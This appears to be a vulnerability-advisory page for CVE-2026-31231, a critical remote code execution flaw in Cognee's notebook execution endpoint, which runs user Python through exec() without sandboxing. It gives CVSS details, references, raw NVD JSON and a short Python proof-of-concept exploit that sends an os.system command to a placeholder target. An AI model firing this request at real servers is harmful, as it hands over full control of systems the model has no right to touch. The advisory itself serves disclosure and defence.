CVE-2026-31231

Description

Cognee thru v0.4.0 contains a critical remote code execution vulnerability in its notebook cell execution API endpoint. The endpoint is designed to execute arbitrary Python code provided by the user, but it does so using the unsafe exec() function without any sandboxing, validation, or security controls. An attacker can exploit this by sending a specially crafted POST request containing malicious Python code to the execution endpoint. This leads to arbitrary code execution on the Cognee server with the privileges of the server process, allowing complete compromise of the system.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cognee <= 0.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable Cognee instance
target_url = "http://target-ip:port/api/execute"

# Malicious Python payload to execute commands on the server
# Example: executing 'whoami' command
payload_data = {
    "code": "import os; os.system('whoami')"
}

try:
    # Sending the POST request to the vulnerable endpoint
    response = requests.post(target_url, json=payload_data)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Server output:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31231
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31231
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31231/
[4] VulDB https://vuldb.com/cve/CVE-2026-31231
[5] https://github.com/topoteretes/cognee
[6] https://www.notion.so/CVE-2026-31231-35d1e13931888178a963ef9efeb29113

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31231", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.387", "lastModified": "2026-05-15T19:16:57.960", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cognee thru v0.4.0 contains a critical remote code execution vulnerability in its notebook cell execution API endpoint. The endpoint is designed to execute arbitrary Python code provided by the user, but it does so using the unsafe exec() function without any sandboxing, validation, or security controls. An attacker can exploit this by sending a specially crafted POST request containing malicious Python code to the execution endpoint. This leads to arbitrary code execution on the Cognee server with the privileges of the server process, allowing complete compromise of the system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/topoteretes/cognee", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31231-35d1e13931888178a963ef9efeb29113", "source": "[email protected]"}]}}